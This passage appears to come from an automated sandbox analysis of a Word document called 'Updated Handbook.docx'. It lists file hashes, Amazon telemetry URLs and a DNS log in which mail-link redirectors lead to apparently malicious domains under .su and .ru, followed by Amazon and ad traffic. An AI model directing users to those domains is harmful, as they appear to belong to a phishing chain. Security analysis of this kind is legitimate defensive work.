                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:99EW8DTCPK04PDBCDQEK$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3D99EW8DTCPK04PDBCDQEK%26ic%3D2%26sw%3D1280%26sh%3D1024%26vw%3D1263%26vh%3D907%26m%3D1%26sc%3D99EW8DTCPK04PDBCDQEK%26ue%3D4%26bb%3D211%26ns%3D232%26ne%3D312%26be%3D627%26fp%3D285%26fcp%3D285%26pc%3D2619%26tc%3D-1195%26na_%3D-1195%26ul_%3D-1723469088077%26_ul%3D-1723469088077%26rd_%3D-1723469088077%26_rd%3D-1723469088077%26fe_%3D-1192%26lk_%3D-1180%26_lk%3D-1180%26co_%3D-1180%26_co%3D-452%26sc_%3D-1179%26rq_%3D-452%26rs_%3D-180%26_rs%3D186%26dl_%3D-52%26di_%3D711%26de_%3D712%26_de%3D719%26_dc%3D2618%26ld_%3D2618%26_ld%3D-1723469088077%26ntd%3D0%26ty%3D0%26rc%3D0%26hob%3D4%26hoe%3D5%26ld%3D2620%26t%3D1723469090697%26ctb%3D1%26rt%3D__ld%3A25-5-4-12-4-7-1%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-06%7Caui%3Acss%3Acache%7Caui%3Ajs%3Acache%7CmutObsYes%7Cewc%3Aunpersist%7Cewc%3Aunpersist%3Aemptycart%7Cewc%3Abview%7Cewc%7Cewc%3Aunrec%7Cewc%3Acartsize%3A0%7Cewc%3Aaui%7Cnavbar%7Cfls-eu-amazon-ae%7Cadblk_no%7CperfYes%7Cfy_cdn_fr%7Cfy_cdn_mp%7CFWCIMEnabled%7CmutObsActive%7Ccsm-feature-touch-enabled%3Afalse%26viz%3Dvisible%3A4%26pty%3DFreshMerchandisedContent%26spty%3Dlearn-more%26pti%3Dlearn-more%26tid%3D99EW8DTCPK04PDBCDQEK%26aftb%3D1%26lob%3D1:2624
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 153x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):7665
                                                                                                                                                                                                                                                                Entropy (8bit):7.947256301608529
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:T50UzTKCCJetCuLhVDf+WXU3Kk2z3fT+p4WaRXJP:TXGJmk3STT+pR0
                                                                                                                                                                                                                                                                MD5:86E7D9E626B040A6248209C0B553C38A
                                                                                                                                                                                                                                                                SHA1:B5BEA5B1C92CB0086E15C04D3D57FA8C0A38AE87
                                                                                                                                                                                                                                                                SHA-256:F0EA852027C1A56F60E816245C64FD8DA7DC61F349A2FB535CDD826B7C8FB6EC
                                                                                                                                                                                                                                                                SHA-512:00A63817B7A09FDF06AB4B061A4421770A7AFF72CB93833ADDE80F1B49FA4EE22CB630C2066CFE5CCFBB0B2ECB363ECD86D6EF8B80191E4456CE6AD99FBE2CEF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71H5TbZ9G6L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1..A."Qa.q....#2R....3Bbs.....S...$5CD...................................................!.1."Q.Aa...#2q....BR..................?..t....h.*%...._E..D.t...d..eb?c.._.C..........A..R....w.J........$v....(.&..4.9Rf.,...d.U=..R.X...P.{.e./..........U.....x...2j....&3.......R....._..d.v...~|....i...t..."/~G........Y...W.S..>o..w..f_.:V$/.N3. ...1.y......|=...5...LM..=..?1L1.q...-`...[\..!..2.kN.|k..Q....1.I$2..L.d...i.....O.Y]J.pg....)...$..._..lc5.....eQ...~cn.S.EV.rnI./...CQ*.%.z...]...I<..;..oG.2H.0......Z...:.B.J...x..[=.. |.._...4.5.r..y.w....=.$..C.C....Un.I..|Cpk.]v..Y..R../.-/...$.V..^.qAy....&..._M...'p.<...RN}..."G.~\.>...[..Z.v.A....bA s.....z]m......r.2.....*...E...O..S......h(.0...Mf..Ei~.\.%$...A".8(}H.......Rj
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9720
                                                                                                                                                                                                                                                                Entropy (8bit):7.949351729172538
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:HJ3hX9oCmAccgDULcGznEMbV1YpSAluf0NkJ+al0weu4alQuJLIH9Z+:HfKCmAcrUYQnEMTiNkYal0we6lQuCHb+
                                                                                                                                                                                                                                                                MD5:06962B89C87DF1D03BFF1AB1D2DD8CA5
                                                                                                                                                                                                                                                                SHA1:45CDF6CF13EF2041107CF96319167F28F5936E38
                                                                                                                                                                                                                                                                SHA-256:32A555B4B3BDC0CE46DB572BC8A0740198FC999D342464837A53DBC553E70AA3
                                                                                                                                                                                                                                                                SHA-512:43603EE532CF2FF5929AF6D91319898427FED5C4C52F74097AB4BEF048C24C0150DF225E5D680FD2D4CF9242894E21A88C87421AB6AA6615A124D426BC88C311
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1.".A.#2BQaq.R...3C...$6bc...%Tru.................................................!1..A.q..."#2Qa....CR...............?..t...^.....h."C..V/v.#%...]..;..V..I.O.cZ.i.Vr?...B1m...B@....-.su{ .;.....E.}C.c..s..R@...i..2..............w...J.kW7...<}!....J....uu....,....ZS..sY....S..:T.WB.....E!K...I...EO...+.z..q../d..h1.l...X$..U....>..%....$Q..UZ.....tx....or.Y.#.......S-...Q....{X..kh..F@.P...<..0.....*6c-z.."...I.....................'.%p.K......+.j.i....E...2........F*....l.....l.F.Q..l.T..!..r..R...>.o.j..A.I.....w.cue\z...+.Q.....r....5..e....[.....G.8.r... oq.S...(... .0k.f{..t..gf.{..Q}#.....NVa...m ../......,..`..'....>.....L^s.j$......a.#.].c..[w.L...F.r............'N.}.Jo..*.T..bE..)T$R....(.)J.JR.R..(.\..X....1#.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:6NXZ98JFWKRECR4538X7$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3D6NXZ98JFWKRECR4538X7%26sw%3D1280%26sh%3D1024%26vw%3D1263%26vh%3D907%26m%3D1%26sc%3D6NXZ98JFWKRECR4538X7%26ue%3D7%26bb%3D102%26ns%3D137%26ne%3D227%26be%3D629%26fp%3D198%26fcp%3D198%26pc%3D24797%26tc%3D-1555%26na_%3D-1555%26ul_%3D-1723469094449%26_ul%3D-1723469094449%26rd_%3D-1723469094449%26_rd%3D-1723469094449%26fe_%3D-1551%26lk_%3D-1502%26_lk%3D-1502%26co_%3D-1502%26_co%3D-760%26sc_%3D-1488%26rq_%3D-760%26rs_%3D-43%26_rs%3D466%26dl_%3D-33%26di_%3D656%26de_%3D657%26_de%3D701%26_dc%3D24796%26ld_%3D24797%26_ld%3D-1723469094449%26ntd%3D0%26ty%3D0%26rc%3D0%26hob%3D5%26hoe%3D7%26ld%3D24798%26t%3D1723469119247%26ctb%3D1%26rt%3D__ld%3A92-9-2-75-7-6-1%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-06%7CmutObsYes%7Cewc%3Aunpersist%7Cewc%3Aunpersist%3Aemptycart%7Cewc%3Abview%7Cewc%7Cewc%3Aunrec%7Cewc%3Acartsize%3A0%7Cewc%3Aaui%7Cnavbar%7Caui%3Acss%3Acache%7Caui%3Ajs%3Acache%7CmutObsActive%7CFWCIMEnabled%7Cfls-eu-amazon-ae%7Cadblk_no%7CperfYes%7Cfy_cdn_fr%7Cfy_cdn_mp%7Ccsm-feature-touch-enabled%3Afalse%7Caui%3Asw%3Apage_proxy%3Arequest_feature_tags%3Atimed_out%26viz%3Dvisible%3A6%26pty%3Dzeitgeist%26spty%3Dbs%26pti%3Dundefined%26tid%3D6NXZ98JFWKRECR4538X7%26aftb%3D1%26lob%3D1:24800
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                File type:Microsoft Word 2007+
                                                                                                                                                                                                                                                                Entropy (8bit):7.881019186367284
                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                                                                                                                                                                                                                                                                • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                                                                                                                                                                                                                                                                • ZIP compressed archive (8000/1) 9.41%
                                                                                                                                                                                                                                                                File name:Updated Handbook.docx
                                                                                                                                                                                                                                                                File size:15'589 bytes
                                                                                                                                                                                                                                                                MD5:5b06a077487034e4575df481e65c2139
                                                                                                                                                                                                                                                                SHA1:bfc759bfa271f1630fd71d0fbd34824c807c2f9b
                                                                                                                                                                                                                                                                SHA256:465067a09f19aaadff2fc0987689f9e8a39f6f707a4fcda6ce55a88e18e3bf73
                                                                                                                                                                                                                                                                SHA512:ec6ad434856c7ea1c49014b932da54bd0d520ff2ed42535aa77c78fff321f3777981eff780384c01fd9bb1ece3720a89bb632b4b4adf94c45e5c2a75ba6596b8
                                                                                                                                                                                                                                                                SSDEEP:384:QhzAALKwFzMwRPAh/vZmyaBydwHh45XFZIFp338:cAA+wFowWx5aByiuPs38
                                                                                                                                                                                                                                                                TLSH:BE62BF09E8B10414F0C796FDF26429C2DEAB50EFF565A04D384B22F846B1A9C07AFE4D
                                                                                                                                                                                                                                                                File Content Preview:PK...........Y................[Content_Types].xml...N.0.E.%..5n.@....!..J..p.Ik.{,{...3Ih..$...H...{}c+.......h.M.Q6L.p..q.i....\...d....nuq.n....Qm............a-.T.r.b<.^......*F:..B.....-/7.<.&7M_%5M...Q..,...q0@.;&...fo.i-...'n.........i`....Uiy$.U^F..
                                                                                                                                                                                                                                                                Icon Hash:35e5c48caa8a8599
                                                                                                                                                                                                                                                                Document Type:OpenXML
                                                                                                                                                                                                                                                                Number of OLE Files:1
                                                                                                                                                                                                                                                                Has Summary Info:
                                                                                                                                                                                                                                                                Application Name:
                                                                                                                                                                                                                                                                Encrypted Document:False
                                                                                                                                                                                                                                                                Contains Word Document Stream:True
                                                                                                                                                                                                                                                                Contains Workbook/Book Stream:False
                                                                                                                                                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                                                                                                                                                Contains ObjectPool Stream:False
                                                                                                                                                                                                                                                                Flash Objects Count:0
                                                                                                                                                                                                                                                                Contains VBA Macros:False
                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:01.702934980 CEST192.168.2.41.1.1.10x7593Standard query (0)redirect.aecdaily.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:01.703162909 CEST192.168.2.41.1.1.10x2bf3Standard query (0)redirect.aecdaily.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:02.844573021 CEST192.168.2.41.1.1.10x8c1bStandard query (0)url.us.m.mimecastprotect.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:02.844573021 CEST192.168.2.41.1.1.10xfe4Standard query (0)url.us.m.mimecastprotect.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:06.086607933 CEST192.168.2.41.1.1.10xb261Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:06.086745024 CEST192.168.2.41.1.1.10x5f4dStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:06.796747923 CEST192.168.2.41.1.1.10xb52eStandard query (0)url6.mailanyone.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:06.796932936 CEST192.168.2.41.1.1.10x61d0Standard query (0)url6.mailanyone.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:09.086597919 CEST192.168.2.41.1.1.10x1f76Standard query (0)url6.mailanyone.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:09.086798906 CEST192.168.2.41.1.1.10xc400Standard query (0)url6.mailanyone.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:17.125961065 CEST192.168.2.41.1.1.10x5c9aStandard query (0)specialpoint.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:17.126477003 CEST192.168.2.41.1.1.10x14b7Standard query (0)specialpoint.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:18.218933105 CEST192.168.2.41.1.1.10xa59aStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:18.219106913 CEST192.168.2.41.1.1.10xee16Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:19.980150938 CEST192.168.2.41.1.1.10x873cStandard query (0)nkoc4.ancolabi.suA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:19.980259895 CEST192.168.2.41.1.1.10x11e7Standard query (0)nkoc4.ancolabi.su65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:20.162578106 CEST192.168.2.41.1.1.10x5c22Standard query (0)specialpoint.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:20.162810087 CEST192.168.2.41.1.1.10x2750Standard query (0)specialpoint.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:21.468708992 CEST192.168.2.41.1.1.10x367bStandard query (0)iic.jaishict.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:21.468848944 CEST192.168.2.41.1.1.10xbb62Standard query (0)iic.jaishict.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:23.042231083 CEST192.168.2.41.1.1.10xe6baStandard query (0)www.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:23.042383909 CEST192.168.2.41.1.1.10xbcStandard query (0)www.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:23.253870964 CEST192.168.2.41.1.1.10xa4c8Standard query (0)iic.jaishict.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:23.254029036 CEST192.168.2.41.1.1.10xf2d6Standard query (0)iic.jaishict.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.222721100 CEST192.168.2.41.1.1.10x625aStandard query (0)images-eu.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.222956896 CEST192.168.2.41.1.1.10x83a0Standard query (0)images-eu.ssl-images-amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.223577023 CEST192.168.2.41.1.1.10xa4faStandard query (0)m.media-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.223707914 CEST192.168.2.41.1.1.10x45a9Standard query (0)m.media-amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.224138021 CEST192.168.2.41.1.1.10xc54aStandard query (0)completion.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:24.224289894 CEST192.168.2.41.1.1.10x8597Standard query (0)completion.amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.375519037 CEST192.168.2.41.1.1.10x2c2bStandard query (0)m.media-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.376070976 CEST192.168.2.41.1.1.10x5d8eStandard query (0)m.media-amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.756661892 CEST192.168.2.41.1.1.10xeabfStandard query (0)images-eu.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:25.756823063 CEST192.168.2.41.1.1.10x9e72Standard query (0)images-eu.ssl-images-amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:26.103053093 CEST192.168.2.41.1.1.10xcce2Standard query (0)images-eu.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:26.103317022 CEST192.168.2.41.1.1.10xb20dStandard query (0)images-eu.ssl-images-amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:27.135528088 CEST192.168.2.41.1.1.10x9b6cStandard query (0)unagi-eu.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:27.135741949 CEST192.168.2.41.1.1.10x3cafStandard query (0)unagi-eu.amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:27.826426983 CEST192.168.2.41.1.1.10x9b59Standard query (0)m.media-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:27.826477051 CEST192.168.2.41.1.1.10xc507Standard query (0)m.media-amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.183459044 CEST192.168.2.41.1.1.10x77c9Standard query (0)www.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.183700085 CEST192.168.2.41.1.1.10x97cfStandard query (0)www.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.889409065 CEST192.168.2.41.1.1.10xce03Standard query (0)fls-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:28.889573097 CEST192.168.2.41.1.1.10x1aa4Standard query (0)fls-eu.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:30.000416040 CEST192.168.2.41.1.1.10xe021Standard query (0)fls-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:30.000561953 CEST192.168.2.41.1.1.10xaa19Standard query (0)fls-eu.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:49.938188076 CEST192.168.2.41.1.1.10x5276Standard query (0)completion.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:49.938388109 CEST192.168.2.41.1.1.10x613cStandard query (0)completion.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:49.946547985 CEST192.168.2.41.1.1.10x20adStandard query (0)aax-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:49.946743965 CEST192.168.2.41.1.1.10x9529Standard query (0)aax-eu.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:50.872076035 CEST192.168.2.41.1.1.10x72f6Standard query (0)aax-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:50.872324944 CEST192.168.2.41.1.1.10x28d3Standard query (0)aax-eu.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:52.926314116 CEST192.168.2.41.1.1.10x135Standard query (0)unagi.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:52.926472902 CEST192.168.2.41.1.1.10x6594Standard query (0)unagi.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:54.757358074 CEST192.168.2.41.1.1.10x819bStandard query (0)unagi.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:23:54.757503033 CEST192.168.2.41.1.1.10x6b87Standard query (0)unagi.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:07.236140966 CEST192.168.2.41.1.1.10x1b41Standard query (0)aax-eu.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:07.236421108 CEST192.168.2.41.1.1.10xbba1Standard query (0)aax-eu.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.709969997 CEST192.168.2.41.1.1.10x2269Standard query (0)ib.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.710561037 CEST192.168.2.41.1.1.10xa1bbStandard query (0)ib.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.711205006 CEST192.168.2.41.1.1.10x83daStandard query (0)match.360yield.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:10.711493015 CEST192.168.2.41.1.1.10x6840Standard query (0)match.360yield.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.011075020 CEST192.168.2.41.1.1.10x6b0aStandard query (0)redirect.prod.experiment.routing.cloudfront.aws.a2z.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.011240959 CEST192.168.2.41.1.1.10xa388Standard query (0)redirect.prod.experiment.routing.cloudfront.aws.a2z.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.750231981 CEST192.168.2.41.1.1.10x60eStandard query (0)audex.userreport.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.750452042 CEST192.168.2.41.1.1.10xa062Standard query (0)audex.userreport.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.751185894 CEST192.168.2.41.1.1.10xaed0Standard query (0)rd.frontend.weborama.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.751353979 CEST192.168.2.41.1.1.10xde2eStandard query (0)rd.frontend.weborama.fr65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.751846075 CEST192.168.2.41.1.1.10x465aStandard query (0)rtb-csync.smartadserver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.752016068 CEST192.168.2.41.1.1.10xa558Standard query (0)rtb-csync.smartadserver.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.752440929 CEST192.168.2.41.1.1.10x9cf9Standard query (0)dsum-sec.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.752532959 CEST192.168.2.41.1.1.10xb73aStandard query (0)dsum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.793674946 CEST192.168.2.41.1.1.10x3709Standard query (0)tags.bluekai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.793833017 CEST192.168.2.41.1.1.10x9ac9Standard query (0)tags.bluekai.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.794249058 CEST192.168.2.41.1.1.10xc1b7Standard query (0)pbs.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.794367075 CEST192.168.2.41.1.1.10xc28eStandard query (0)pbs.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.794709921 CEST192.168.2.41.1.1.10x7c1bStandard query (0)capi.connatix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.794821978 CEST192.168.2.41.1.1.10xddbStandard query (0)capi.connatix.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.795146942 CEST192.168.2.41.1.1.10xe36Standard query (0)amazon.partners.tremorhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.795264959 CEST192.168.2.41.1.1.10x710Standard query (0)amazon.partners.tremorhub.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.806088924 CEST192.168.2.41.1.1.10x3fafStandard query (0)amazon.partners.tremorhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.816376925 CEST192.168.2.41.1.1.10x8940Standard query (0)public-prod-dspcookiematching.dmxleo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.816500902 CEST192.168.2.41.1.1.10x332Standard query (0)public-prod-dspcookiematching.dmxleo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.816906929 CEST192.168.2.41.1.1.10x9b97Standard query (0)ads.stickyadstv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:11.817035913 CEST192.168.2.41.1.1.10xee4fStandard query (0)ads.stickyadstv.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.114599943 CEST192.168.2.41.1.1.10x1ffStandard query (0)a1d260d3e4810dfad67eec02571e86f4b.profile.akl50-c2.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.114753962 CEST192.168.2.41.1.1.10x52d8Standard query (0)a1d260d3e4810dfad67eec02571e86f4b.profile.akl50-c2.cloudfront.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.696981907 CEST192.168.2.41.1.1.10x8d46Standard query (0)sync.rfp.fout.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.697138071 CEST192.168.2.41.1.1.10x67dbStandard query (0)sync.rfp.fout.jp65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.806054115 CEST192.168.2.41.1.1.10x8828Standard query (0)beacon.krxd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.806175947 CEST192.168.2.41.1.1.10x53eStandard query (0)beacon.krxd.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.809092999 CEST192.168.2.41.1.1.10x876eStandard query (0)s.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.809267998 CEST192.168.2.41.1.1.10x21e3Standard query (0)s.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.814943075 CEST192.168.2.41.1.1.10x15ffStandard query (0)beacon.krxd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.825146914 CEST192.168.2.41.1.1.10xf8dbStandard query (0)x.bidswitch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.825335026 CEST192.168.2.41.1.1.10x6d76Standard query (0)x.bidswitch.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.856362104 CEST192.168.2.41.1.1.10xa23bStandard query (0)match.sharethrough.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:12.856587887 CEST192.168.2.41.1.1.10xcd24Standard query (0)match.sharethrough.com65IN (0x0001)false
